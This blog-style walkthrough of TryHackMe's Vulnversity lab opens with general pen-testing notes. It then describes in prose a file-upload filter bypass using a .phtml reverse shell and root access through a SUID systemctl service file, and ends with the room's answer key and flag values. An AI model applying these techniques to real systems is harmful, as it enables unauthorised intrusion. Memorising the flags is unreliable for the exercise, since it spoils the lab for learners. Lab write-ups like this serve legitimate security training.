Introduction
This post is a walkthrough for the Vulnversity” challenge on TryHackMe, designed to practice basic web exploitation and privilege escalation techniques in a controlled environment. The tutorial focuses on web-based vulnerability exploitation, basic privilege escalation, and file upload bypass techniques. This challenge emphasizes the core methodology of recon, exploitation, and privilege escalation in penetration testing.
HackTheBox Certified Penetration Testing Specialist Study Notes
Web Hacking & Pentesting Study Notes
What is Penetration Testing
Penetration testing, or “pen testing,” is a security assessment process where cybersecurity professionals simulate real-world attacks on a computer system, network, or web application to identify vulnerabilities. The goal is to uncover and address security weaknesses before malicious hackers exploit them. Here’s an overview:
1. Purpose of Penetration Testing
- Identify Vulnerabilities: Pinpoint weaknesses in an organization’s infrastructure, applications, and configurations.
- Improve Security Posture: Offer insights for strengthening defenses and mitigating risks.
- Compliance and Assurance: Many industries require regular pen tests to meet security compliance standards (e.g., PCI-DSS for payment systems).
2. Types of Penetration Testing
- Network Penetration Testing: Targets network infrastructure, assessing firewall, router, and server security.
- Web Application Penetration Testing: Focuses on web apps, testing for vulnerabilities like SQL injection, XSS (Cross-Site Scripting), and authentication weaknesses.
- Social Engineering: Tests human factors by attempting to manipulate employees into revealing sensitive information.
- Wireless Penetration Testing: Assesses the security of Wi-Fi networks, ensuring strong encryption and configuration.
- Physical Penetration Testing: Evaluates physical security, such as entry points, ID checks, and access control mechanisms.
3. Stages of Penetration Testing
- Planning and Reconnaissance: Define the scope and gather information (e.g., IP addresses, software details).
- Scanning: Identify entry points by examining the target’s response to various inputs.
- Gaining Access: Attempt to exploit vulnerabilities to gain unauthorized access.
- Maintaining Access: Simulate advanced attacks to see how long access can be sustained.
- Analysis and Reporting: Document findings, analyze results, and provide recommendations.
4. Penetration Testing Tools
- Nmap: A tool for network discovery and security auditing.
- Metasploit: A framework for developing and executing exploit code.
- Burp Suite: A toolkit for web application security testing.
- Wireshark: A network protocol analyzer for capturing and inspecting data packets.
- OWASP ZAP: An open-source tool for finding vulnerabilities in web applications.
5. Importance of Penetration Testing
- Proactive Security: Finds and fixes vulnerabilities proactively, reducing the risk of cyberattacks.
- Protects Sensitive Data: Ensures that sensitive data remains secure by identifying risks before they can be exploited.
- Continuous Improvement: Regular testing helps maintain a robust security posture as technologies and threats evolve.
6. Challenges in Penetration Testing
- Scope Creep: Expanding beyond the initially defined scope, which can make results unfocused.
- False Positives: Incorrectly identifying vulnerabilities that aren’t truly exploitable.
- Resource-Intensive: Requires time, skilled personnel, and specialized tools, which can be costly for organizations.
Penetration Testing Methodology
Initial Nmap Scan:
- An Nmap scan is used to identify open ports and services. Key open ports include:
- FTP (21), SSH (22), Samba (139, 445),
- Squid proxy (3128), and an HTTP server on port 3333 (Apache).
- The scan provides version information, which is crucial for determining potential vulnerabilities.
Directory Enumeration:
- Using Gobuster, directories on the web server are enumerated. The
/internal
directory is identified, containing an upload page—a potential entry point for uploading a reverse shell.
Reverse Shell Upload and Execution:
- The upload page filters certain file types, so the reverse shell is renamed with a
.phtml
extension to bypass restrictions. - Once uploaded successfully, the shell is accessed through the
/internal/uploads
path, establishing a connection to the attacker’s machine.
Privilege Escalation:
- After accessing the server as a low-privileged user, further enumeration identifies an exploitable SUID binary,
systemctl
. - Systemctl Exploit: By crafting a malicious service file, the
systemctl
command is leveraged to escalate privileges to the root user.
Retrieving Flags:
- The root flag is located in the root user’s directory after privilege escalation, marking the final step of the challenge.
Room Answers | TryHackMe Basic Pentesting Walkthrough
There are many Nmap “cheatsheets” online that you can use too.
No answer needed
Scan the box; how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
It’s essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
No answer needed
What is the flag for enabling verbose mode using Nmap?
-v
I have successfully configured Gobuster.
No answer needed
What is the directory that has an upload form page?
/internal/
What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.
.php
I understand the Burpsuite tool and its purpose during pentesting.
No answer needed
What extension is allowed after running the above exercise?
.phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
No answer needed
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
On the system, search for all SUID files. Which file stands out?
/bin/systemctl
What is the root flag value?
a58ff8579f0a9270368d33a9966c7fd5